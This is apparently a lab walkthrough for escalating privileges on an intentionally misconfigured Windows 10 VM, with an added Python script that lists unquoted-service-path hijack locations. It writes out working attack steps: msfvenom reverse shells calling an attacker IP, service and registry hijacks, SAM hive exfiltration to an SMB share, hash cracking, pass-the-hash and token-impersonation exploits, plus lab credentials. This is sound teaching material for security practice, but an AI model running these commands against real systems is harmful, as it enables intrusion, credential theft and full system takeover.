windows10privesc.md

Practice your Windows Privilege Escalation skills on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM! RDP is available. Credentials: user:password321

Generate a Reverse Shell Executable

on the attacker machine, generate a reverse shell executable with msfvenom and serve it over HTTP (http.server listens on port 8000 by default); a listener on port 4444 must be running on the attacker machine before any of the exploits below is triggered

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.37.45 LPORT=4444 -f exe -o reverse.exe
python3 -m http.server

on the windows 10 machine, fetch it with the built-in curl.exe

curl 10.18.37.45:8000/reverse.exe -o reverse.exe

Service Exploits - Insecure Service Permissions

use accesschk.exe to check the "user" account's permissions on the "daclsvc" service (-c = the name is a service, -w = show only write access, -v = verbose, -q = no banner, -u = suppress errors)

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

note that the user account has write access including SERVICE_CHANGE_CONFIG, which is enough to change the service configuration

query the service

sc qc daclsvc

note that SERVICE_START_NAME is LocalSystem, so whatever the service is configured to run executes as SYSTEM

modify the service config and set the binpath to our reverse.exe (sc requires the space after "binpath=", and the inner quotes around the path are escaped)

sc config daclsvc binpath= "\"C:\Users\user\Desktop\reverse.exe\""

now, with a listener running on the attacker machine, start the service

net start daclsvc

the start eventually fails with a timeout error, because reverse.exe never reports back to the service control manager, but by then the SYSTEM shell has already connected

Service Exploits - Unquoted Service Path

query the "unquotedsvc" service

sc qc unquotedsvc

note that it runs with LocalSystem privileges and the BINARY_PATH_NAME is unquoted and contains spaces: when Windows starts such a service it tries each space-delimited prefix of the path with ".exe" appended before reaching the real binary, so a file placed at one of those earlier prefixes is executed instead

check whether the directory holding one of those prefixes is writable, using accesschk.exe again (-d = directory)

C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

note that the BUILTIN\Users group is allowed to write to this directory

drop reverse.exe at the first space-delimited prefix that falls inside the writable directory

copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

now, start another listener and start the service

net start unquotedsvc
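As an added example (not code from this walkthrough or from any of the tools it uses), the following Python script runs on the attacker machine over captured `sc qc` output and lists, for every unquoted path with spaces, the prefix locations Windows will try before the real binary. The three `sc qc` dumps are constructed: the service names are the page's, but the binary paths and accounts in them are assumed for illustration.

```python
"""Triage captured 'sc qc' output for unquoted-service-path hijacks.

Added example for this walkthrough, not code from the page or from any tool it
uses. It runs on the attacker machine over text pasted from the target. The
three 'sc qc' dumps below are constructed: the service names are the page's,
the binary paths and accounts are assumed for illustration.
"""
import re

SC_QC_SAMPLES = {
    "unquotedsvc": r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        DISPLAY_NAME       : Unquoted Path Service
        SERVICE_START_NAME : LocalSystem
""",
    "daclsvc": r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        DISPLAY_NAME       : DACL Service
        SERVICE_START_NAME : LocalSystem
""",
    "Schedule": r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Schedule
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        DISPLAY_NAME       : Task Scheduler
        SERVICE_START_NAME : LocalSystem
""",
}

# Accounts whose services give SYSTEM-level code execution when hijacked.
PRIVILEGED = {"localsystem", r"nt authority\system"}


def parse_sc_qc(text):
    """Pull the fields we care about out of one 'sc qc' dump."""
    def field(name):
        m = re.search(rf"^\s*{name}\s*:\s*(.*?)\s*$", text, re.MULTILINE)
        return m.group(1) if m else ""
    return {
        "name": field("SERVICE_NAME"),
        "binary_path": field("BINARY_PATH_NAME"),
        "runs_as": field("SERVICE_START_NAME"),
    }


def hijack_candidates(binary_path):
    """Return the paths CreateProcess tries, in order, before the intended binary.

    For an unquoted path containing spaces, Windows treats each space as a
    possible end of the executable name and appends '.exe'. A quoted path or a
    path without spaces is unambiguous and yields no candidates.
    """
    if binary_path.startswith('"'):
        return []
    tokens = binary_path.split(" ")
    # The image name ends at the first token ending in .exe; the rest are arguments.
    exe_end = next((i for i, t in enumerate(tokens) if t.lower().endswith(".exe")),
                   len(tokens) - 1)
    image_tokens = tokens[: exe_end + 1]
    return [" ".join(image_tokens[:i]) + ".exe" for i in range(1, len(image_tokens))]


def triage(samples):
    """Map service name -> details for every service with a hijackable path."""
    findings = {}
    for text in samples.values():
        cfg = parse_sc_qc(text)
        cands = hijack_candidates(cfg["binary_path"])
        if cands:
            findings[cfg["name"]] = {
                "runs_as": cfg["runs_as"],
                "privileged": cfg["runs_as"].lower() in PRIVILEGED,
                "candidates": cands,
            }
    return findings


if __name__ == "__main__":
    for name, info in triage(SC_QC_SAMPLES).items():
        who = "SYSTEM" if info["privileged"] else info["runs_as"]
        print(f"{name} (runs as {who}): check write access to the directory of")
        for cand in info["candidates"]:
            print("   ", cand)
```

The candidate list is what to feed to accesschk: the first candidate whose parent directory is writable is where reverse.exe goes, which for the page's service is the Common.exe location used above.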

Service Exploits - Weak Registry Permissions

query the "regsvc" service

sc qc regsvc

note that it runs with LocalSystem privileges

check the permissions on the service's registry key with accesschk.exe (-k = registry key)

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

note that the key is writable by the "NT AUTHORITY\INTERACTIVE" group (every interactively logged-on user), so we can rewrite the ImagePath value that the service control manager reads when the service starts

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\user\Desktop\reverse.exe /f

now, start another listener and start the service

net start regsvc

Service Exploits - Insecure Service Executables

query the "filepermsvc" service

sc qc filepermsvc

check the permissions on the service binary itself with accesschk.exe

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

note that the service binary is writable by Everyone, so it can simply be overwritten in place (/Y suppresses the overwrite prompt)

copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

now, start another listener and start the service

net start filepermsvc

Registry - AutoRuns

query the registry for AutoRun executables (these run at every logon, in the context of the user who logs on)

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

check the permissions on the listed program with accesschk.exe

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

note that the AutoRun program is writable by Everyone

copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

now, start another listener

restart the windows machine and log in again to trigger the reverse shell; it runs with the privileges of whichever user logs on, so an admin logon gives an admin shell

Registry - AlwaysInstallElevated

query the registry for the AlwaysInstallElevated values

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

note that both values are set to 1 (0x1); both the HKCU and the HKLM value must be set for Windows Installer to run packages with SYSTEM privileges

generate a reverse shell Windows Installer package using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.37.45 LPORT=4444 -f msi -o reverse.msi
python3 -m http.server

on the windows 10 machine

curl 10.18.37.45:8000/reverse.msi -o reverse.msi

now, start another listener and run the installer (/quiet /qn suppress the installer UI)

msiexec /quiet /qn /i C:\Users\user\Desktop\reverse.msi

Passwords - Registry

this step assumes the admin account (admin:password123) has been used to log in to the VM

the registry can be searched for keys and values that contain the word "password" (this recursive search of all of HKLM is slow and noisy)

reg query HKLM /f password /t REG_SZ /s

or query the Winlogon key directly for AutoLogon credentials (the DefaultUserName and DefaultPassword values)

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

Passwords - Saved Creds

list any saved credentials

cmdkey /list

note that a credential for the admin user is stored; runas /savecred uses it without prompting for a password, so start another listener and run reverse.exe as admin

runas /savecred /user:admin C:\Users\admin\Desktop\reverse.exe

Passwords - Security Account Manager (SAM)

the SAM and SYSTEM registry hives hold the local account password hashes (SAM) and the boot key needed to decrypt them (SYSTEM); the live copies under C:\Windows\System32\config are locked while Windows runs, but the backup copies in C:\Windows\Repair are readable here

transfer the SAM and SYSTEM files to our machine

on our machine, start an SMB share with impacket

python3 /usr/share/doc/python3-impacket/examples/smbserver.py share .

on the windows VM

copy C:\Windows\Repair\SAM \\10.18.37.45\share\
copy C:\Windows\Repair\SYSTEM \\10.18.37.45\share\

now, dump the hashes (each line is user:RID:LM hash:NT hash:::)

git clone https://github.com/Tib3rius/creddump7
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM

crack the admin NTLM hash using hashcat (put the NT hash, the 32-hex-character field after the LM hash, in hash.txt; -m 1000 selects NTLM mode)

hashcat -m 1000 --force hash.txt /usr/share/wordlists/rockyou.txt

two passwords crack: admin:password123 and Administrator:Passw0rd!

Passwords - Passing the Hash

the NTLM hash itself can be used to authenticate, so the admin hash works with pth-winexe without cracking the password; the -U value has the form user%LMhash:NThash, where aad3b435b51404eeaad3b435b51404ee is the placeholder for an empty LM hash

pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.13.218 cmd.exe

Scheduled Tasks

view the contents of the CleanUp.ps1 script, which a scheduled task executes on a timer

type C:\DevTools\CleanUp.ps1

check our permissions on the script with accesschk.exe

C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

note that we have the ability to write this file, so we can append a line that launches our executable; the scheduled task then runs it with the task's own privileges

echo C:\Users\user\Desktop\reverse.exe >> C:\DevTools\CleanUp.ps1

now, start another listener and wait for the scheduled task to run

Insecure GUI Apps

log in as the user account and open "AdminPaint" on the Desktop

tasklist /V | findstr mspaint.exe

note that Paint is running with admin privileges

in Paint, click "File" and then "Open", and navigate to C:\Windows\System32\cmd.exe; the Open dialog belongs to the admin-privileged process, so anything launched from it inherits those privileges

Startup Apps

use accesschk.exe to check the permissions on the all-users StartUp directory (-d = directory)

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

note that the BUILTIN\Users group can write files here; anything placed in this directory runs at logon for every user, with that user's privileges

run the provided CreateShortcut.vbs with cscript to create a shortcut to reverse.exe in the StartUp directory

cscript C:\PrivEsc\CreateShortcut.vbs

now, start another listener

restart the windows machine and log in again as the admin user to trigger the reverse shell

Token Impersonation - Rogue Potato

set up a socat redirector on the attacker machine, forwarding attacker port 135 to port 9999 on the Windows machine (RoguePotato needs an OXID resolver reachable on port 135 that points back to its own listener on the target)

sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.13.218:9999

start another listener

simulate getting a service account shell by logging in over RDP as the admin user and starting a command prompt as administrator

use PsExec64.exe to run the reverse.exe executable you created with the permissions of the "local service" account

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\Users\user\Desktop\reverse.exe

start another listener

now, in the "local service" reverse shell you triggered, run the RoguePotato exploit (-r = attacker IP hosting the redirector, -e = executable to run as SYSTEM, -l = local listening port) to trigger a second reverse shell with SYSTEM privileges

C:\PrivEsc\RoguePotato.exe -r 10.18.37.45 -e "C:\Users\user\Desktop\reverse.exe" -l 9999

the two privileges on the service account that make this exploit possible are SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege

Token Impersonation - PrintSpoofer

repeat the same setup as before (a listener, then a "local service" shell via PsExec64.exe), but run PrintSpoofer instead of RoguePotato; it needs no socat redirector because it abuses the local print spooler's named pipe (-c = command to run, -i = interact with the current console)

C:\PrivEsc\PrintSpoofer.exe -c "C:\Users\user\Desktop\reverse.exe" -i

Privilege Escalation Scripts

several tools have been written which help find potential privilege escalations on Windows

  • winPEASany.exe
  • Seatbelt.exe
  • PowerUp.ps1
  • SharpUp.exe